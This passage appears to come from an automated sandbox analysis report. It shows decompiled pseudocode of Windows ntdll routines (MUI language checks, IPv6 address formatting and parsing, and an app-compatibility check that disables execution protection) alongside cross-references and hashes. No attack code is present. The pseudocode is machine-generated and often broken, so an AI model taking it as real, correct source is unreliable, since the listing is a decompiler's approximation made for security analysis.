							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x00988788
                                                0x00988788
                                                0x00988791
                                                0x00988794
                                                0x00988798
                                                0x0098879b
                                                0x0098879e
                                                0x009887a1
                                                0x009887a4
                                                0x009887a7
                                                0x009887aa
                                                0x009887af
                                                0x009d1ad3
                                                0x00988b0a
                                                0x00988b0d
                                                0x00988b13
                                                0x00988b19
                                                0x00988b1f
                                                0x00988b25
                                                0x00988b2b
                                                0x00988b31
                                                0x00988b37
                                                0x00988b3d
                                                0x00988b46
                                                0x00988b46
                                                0x009887c6
                                                0x009887d0
                                                0x009d1ae0
                                                0x009d1ae6
                                                0x009d1af8
                                                0x009d1af8
                                                0x009d1afd
                                                0x009d1afe
                                                0x009d1b01
                                                0x009d1b06
                                                0x009d1b06
                                                0x009887d6
                                                0x009887f2
                                                0x009887f7
                                                0x00988807
                                                0x0098880a
                                                0x0098880f
                                                0x00988810
                                                0x00988813
                                                0x00988818
                                                0x00988818
                                                0x0098882c
                                                0x00988831
                                                0x00988838
                                                0x00988908
                                                0x00988920
                                                0x009889f0
                                                0x00988a08
                                                0x00988af6
                                                0x00988af6
                                                0x00988af8
                                                0x00988afb
                                                0x009d1beb
                                                0x009d1beb
                                                0x00988b04
                                                0x009d1bf8
                                                0x009d1c0e
                                                0x009d1c13
                                                0x009d1c16
                                                0x009d1c16
                                                0x009d1bf8
                                                0x00000000
                                                0x00988b04
                                                0x00988a0e
                                                0x00988a11
                                                0x00988a14
                                                0x00988a15
                                                0x00988a18
                                                0x00988a22
                                                0x00988b59
                                                0x00988a28
                                                0x00988a3c
                                                0x00988a3c
                                                0x00988a42
                                                0x009d1bb0
                                                0x009d1b11
                                                0x009d1b11
                                                0x00000000
                                                0x00988a48
                                                0x00988a51
                                                0x00988a5b
                                                0x00988a5e
                                                0x00988a61
                                                0x00988a69
                                                0x00988a69
                                                0x00988a6d
                                                0x00000000
                                                0x00000000
                                                0x00988a74
                                                0x00988a7c
                                                0x00988a7d
                                                0x00988a91
                                                0x00988a93
                                                0x00988a93
                                                0x00988a98
                                                0x00988a9b
                                                0x00988aa1
                                                0x00988aa1
                                                0x00988aa4
                                                0x00988aaa
                                                0x00988ab1
                                                0x00988ac5
                                                0x00988ac7
                                                0x00988ac7
                                                0x00988ac5
                                                0x00988ace
                                                0x009d1bc9
                                                0x009d1bce
                                                0x009d1bd2
                                                0x009d1bd2
                                                0x00988ad8
                                                0x00988aeb
                                                0x00988aeb
                                                0x00988af0
                                                0x00988af4
                                                0x00000000
                                                0x00988af4
                                                0x00988a42
                                                0x00988926
                                                0x00988929
                                                0x0098892c
                                                0x0098892d
                                                0x00988930
                                                0x00988935
                                                0x0098893a
                                                0x00988b51
                                                0x00988940
                                                0x00988954
                                                0x00988954
                                                0x0098895a
                                                0x009d1b63
                                                0x00000000
                                                0x00988960
                                                0x00988969
                                                0x00988973
                                                0x00988976
                                                0x00988979
                                                0x0098897e
                                                0x00988981
                                                0x00988981
                                                0x00988986
                                                0x00000000
                                                0x00000000
                                                0x009d1b6e
                                                0x009d1b74
                                                0x009d1b7b
                                                0x009d1b8f
                                                0x009d1b91
                                                0x009d1b91
                                                0x009d1b99
                                                0x009d1b9c
                                                0x009d1ba2
                                                0x009d1ba2
                                                0x0098898c
                                                0x00988992
                                                0x00988999
                                                0x009889ad
                                                0x009d1ba8
                                                0x009d1ba8
                                                0x009889ad
                                                0x009889b6
                                                0x009889c8
                                                0x009889cd
                                                0x009889d0
                                                0x009889d0
                                                0x009889d6
                                                0x009889e8
                                                0x009889e8
                                                0x009889ed
                                                0x00000000
                                                0x009889ed
                                                0x0098895a
                                                0x0098883e
                                                0x00988841
                                                0x00988844
                                                0x00988845
                                                0x00988848
                                                0x0098884d
                                                0x00988852
                                                0x00988b49
                                                0x00988858
                                                0x0098886c
                                                0x0098886c
                                                0x00988872
                                                0x009d1b0e
                                                0x00000000
                                                0x00988878
                                                0x00988881
                                                0x0098888b
                                                0x0098888e
                                                0x00988891
                                                0x00988896
                                                0x00988899
                                                0x00988899
                                                0x0098889e
                                                0x00000000
                                                0x00000000
                                                0x009d1b21
                                                0x009d1b27
                                                0x009d1b2e
                                                0x009d1b42
                                                0x009d1b44
                                                0x009d1b44
                                                0x009d1b4c
                                                0x009d1b4f
                                                0x009d1b55
                                                0x009d1b55
                                                0x009888a4
                                                0x009888aa
                                                0x009888b1
                                                0x009888c5
                                                0x009d1b5b
                                                0x009d1b5b
                                                0x009888c5
                                                0x009888ce
                                                0x009888e0
                                                0x009888e5
                                                0x009888e8
                                                0x009888e8
                                                0x009888ee
                                                0x00988900
                                                0x00988900
                                                0x00988905
                                                0x00000000
                                                0x00988905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00988914
                                                • WindowsExcludedProcs, xrefs: 009887C1
                                                • Kernel-MUI-Language-SKU, xrefs: 009889FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 009887E6
                                                • Kernel-MUI-Language-Allowed, xrefs: 00988827
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 9f217b05b70302129a97081d888544c18a2ed745f21fcd77e2999140f987ac8b
                                                • Instruction ID: bc9d12bfbb7ca700d3230fea7171e35bb3fb31d81ad98c51c9950f98a210d80f
                                                • Opcode Fuzzy Hash: 9f217b05b70302129a97081d888544c18a2ed745f21fcd77e2999140f987ac8b
                                                • Instruction Fuzzy Hash: 65F1F7B6D00209EFCF11EFA5C981EEEB7B9FF48300F54446AE505A7211EB359A45DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009A13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E009A13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00997707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x962926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00997707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x969cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00997707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00997707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00997707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00997707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x009a13d5
                                                0x009a13d9
                                                0x009a13dc
                                                0x009a13de
                                                0x009a13e1
                                                0x009a13e8
                                                0x009a13ee
                                                0x009ce8fd
                                                0x00000000
                                                0x009ce921
                                                0x009ce921
                                                0x009ce928
                                                0x009ce982
                                                0x009ce98a
                                                0x00000000
                                                0x009ce99a
                                                0x009ce99e
                                                0x009ce9a3
                                                0x009ce9a8
                                                0x009ce9b9
                                                0x009ce978
                                                0x00000000
                                                0x009ce978
                                                0x009ce98a
                                                0x009ce92a
                                                0x009ce931
                                                0x009ce944
                                                0x009ce944
                                                0x009ce950
                                                0x009ce954
                                                0x009ce959
                                                0x009ce95e
                                                0x009ce963
                                                0x009ce970
                                                0x00000000
                                                0x009ce975
                                                0x009ce93b
                                                0x009ce980
                                                0x00000000
                                                0x009ce980
                                                0x009ce942
                                                0x009ce94b
                                                0x00000000
                                                0x009ce94b
                                                0x00000000
                                                0x009ce942
                                                0x009a13f4
                                                0x009a13f4
                                                0x009a13f9
                                                0x009a13fc
                                                0x009a13ff
                                                0x009a1406
                                                0x009ce9cc
                                                0x009ce9d2
                                                0x009ce9d2
                                                0x009ce9cc
                                                0x009a140c
                                                0x009a1411
                                                0x009a1431
                                                0x009a143a
                                                0x009a143c
                                                0x009a143f
                                                0x009a143f
                                                0x009a1442
                                                0x009a1447
                                                0x009a14a8
                                                0x009a14ac
                                                0x009ce9e2
                                                0x009ce9e7
                                                0x009ce9ec
                                                0x009cea05
                                                0x009cea05
                                                0x00000000
                                                0x009a1449
                                                0x00000000
                                                0x009a1449
                                                0x009a144c
                                                0x009a1459
                                                0x009a1462
                                                0x009a1469
                                                0x009a146a
                                                0x009a1470
                                                0x009a1473
                                                0x009a1476
                                                0x009a1476
                                                0x009a1490
                                                0x009a1495
                                                0x009a138e
                                                0x009a1390
                                                0x009a1397
                                                0x009a1398
                                                0x009a1399
                                                0x009a13a1
                                                0x009a13a4
                                                0x009a13a4
                                                0x009a1498
                                                0x009a149c
                                                0x009a149f
                                                0x009a14a2
                                                0x00000000
                                                0x00000000
                                                0x009a14a4
                                                0x00000000
                                                0x009a14a4
                                                0x009a1413
                                                0x009a1415
                                                0x009a1416
                                                0x009a1419
                                                0x009a141c
                                                0x009a1422
                                                0x009a13b7
                                                0x009a13bc
                                                0x009a13bf
                                                0x009a13bf
                                                0x009a13c2
                                                0x009a1424
                                                0x009a1424
                                                0x009a1424
                                                0x009a1427
                                                0x009a142b
                                                0x009a142c
                                                0x009a142c
                                                0x009a142c
                                                0x00000000
                                                0x009a141c
                                                0x009a1411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 7799e3756c3b78c5b80334204a5b6031cd27e8b091e70b2c1ba46d889a844bed
                                                • Instruction ID: d879e83517b3f3d126c6df0bbfd8705b8ffc1b0881864d2359acf6bd7a1ac842
                                                • Opcode Fuzzy Hash: 7799e3756c3b78c5b80334204a5b6031cd27e8b091e70b2c1ba46d889a844bed
                                                • Instruction Fuzzy Hash: 076103B1D04655AACF24CF9DC8908BEBBF9EFDA300B14C52DF4DA47581D634AA40CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00997EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00997EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xa42088; // 0x75f650f4
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00997F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E009B3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0096DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xa44218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E009B3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00970D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E009B3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00978375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E009B3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E009DE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E009B3F92();
					_t38 = 1;
					L2:
					return E0096E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x00997f08
                                                0x00997f0f
                                                0x00997f12
                                                0x00997f1b
                                                0x00997f31
                                                0x009b3ead
                                                0x009b3eb4
                                                0x00000000
                                                0x00000000
                                                0x009b3eba
                                                0x009b3ecd
                                                0x009b3ed2
                                                0x009b3ee1
                                                0x009b3ee7
                                                0x009b3eec
                                                0x009b3f12
                                                0x009b3f18
                                                0x009b3f1a
                                                0x00000000
                                                0x00000000
                                                0x009b3f20
                                                0x009b3f26
                                                0x009b3f28
                                                0x00000000
                                                0x00000000
                                                0x009b3f2e
                                                0x009b3f30
                                                0x00000000
                                                0x00000000
                                                0x009b3f3a
                                                0x009b3f3b
                                                0x009b3f53
                                                0x009b3f64
                                                0x009b3f69
                                                0x009b3f6c
                                                0x009b3f6d
                                                0x009b3f6f
                                                0x009be304
                                                0x009be30f
                                                0x009be315
                                                0x009be31e
                                                0x009be321
                                                0x009be327
                                                0x009be329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009be32f
                                                0x009be32f
                                                0x009be337
                                                0x009be33a
                                                0x009be33b
                                                0x009be33d
                                                0x009be33f
                                                0x009be341
                                                0x009be341
                                                0x009be34e
                                                0x009be353
                                                0x009be358
                                                0x009be35d
                                                0x009be35f
                                                0x00000000
                                                0x00000000
                                                0x009be365
                                                0x009be365
                                                0x009be368
                                                0x009be36e
                                                0x00000000
                                                0x00000000
                                                0x009be374
                                                0x009be32f
                                                0x009b3f75
                                                0x009b3f7a
                                                0x009b3f7c
                                                0x009b3f7e
                                                0x009b3f86
                                                0x00997f39
                                                0x00997f47
                                                0x00997f47
                                                0x00997f37
                                                0x00997f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 009B3F12
                                                Strings
                                                • ExecuteOptions, xrefs: 009B3F04
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 009B3F4A
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 009BE2FB
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 009B3EC4
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 009BE345
                                                • Execute=1, xrefs: 009B3F5E
                                                • &V, xrefs: 00997F1E
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 009B3F75
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$&V
                                                • API String ID: 3901378454-1362695751
                                                • Opcode ID: db32db6baede02c2e565a3b8b459afd0a2d5d78389a53bc95882657aca4a6fb7
                                                • Instruction ID: 7a69b355055750f92f70f5466f43de415494cd57ffab34227f6691891217434f
                                                • Opcode Fuzzy Hash: db32db6baede02c2e565a3b8b459afd0a2d5d78389a53bc95882657aca4a6fb7
                                                • Instruction Fuzzy Hash: A341D971A8060D7ADF20DB94DCCAFEAB3BCAB94714F0005A9B105F6081EA70EB458F71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009A0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E009A0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00978980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0096DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E009A0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E009A0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009A06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009A06BA(_t135, _t178) == 0 || E009A0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E009A0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E009A0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009A06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009A06BA(_t124, _t142) == 0 || E009A0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x009a0b21
                                                0x009a0b24
                                                0x009a0b27
                                                0x009a0b2a
                                                0x009a0b2d
                                                0x009a0b30
                                                0x009a0b33
                                                0x009a0b36
                                                0x009a0b39
                                                0x009a0b3e
                                                0x009a0c65
                                                0x009a0c68
                                                0x009a0c6a
                                                0x009a0c6f
                                                0x009ceb42
                                                0x00000000
                                                0x00000000
                                                0x009ceb48
                                                0x009ceb48
                                                0x009a0c75
                                                0x009a0c7a
                                                0x009ceb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009ceb5a
                                                0x009a0c80
                                                0x009a0c84
                                                0x009ceb98
                                                0x00000000
                                                0x00000000
                                                0x009ceba6
                                                0x009a0cb8
                                                0x009a0cba
                                                0x009a0cd3
                                                0x009a0cda
                                                0x009a0ce4
                                                0x009a0ce9
                                                0x00000000
                                                0x009a0cec
                                                0x009a0c8c
                                                0x009ceb63
                                                0x00000000
                                                0x00000000
                                                0x009ceb70
                                                0x009ceb75
                                                0x009ceb7d
                                                0x00000000
                                                0x00000000
                                                0x009ceb8c
                                                0x00000000
                                                0x009ceb8c
                                                0x009a0c96
                                                0x00000000
                                                0x00000000
                                                0x009a0ca2
                                                0x009a0cac
                                                0x009a0cb4
                                                0x00000000
                                                0x00000000
                                                0x009a0b44
                                                0x009a0b47
                                                0x009a0b49
                                                0x00000000
                                                0x00000000
                                                0x009a0b4f
                                                0x009a0b50
                                                0x00000000
                                                0x00000000
                                                0x009a0b56
                                                0x009a0b62
                                                0x009a0b7c
                                                0x009a0bac
                                                0x009a0a0f
                                                0x009ceaaa
                                                0x00000000
                                                0x009ceac4
                                                0x009ceac4
                                                0x009a0bd0
                                                0x009a0bd0
                                                0x009a0bd4
                                                0x009a0bd9
                                                0x00000000
                                                0x00000000
                                                0x009a0bdb
                                                0x009a0be0
                                                0x009ceb0e
                                                0x009a0a1a
                                                0x00000000
                                                0x009a0a1a
                                                0x009ceb1a
                                                0x009ceb1f
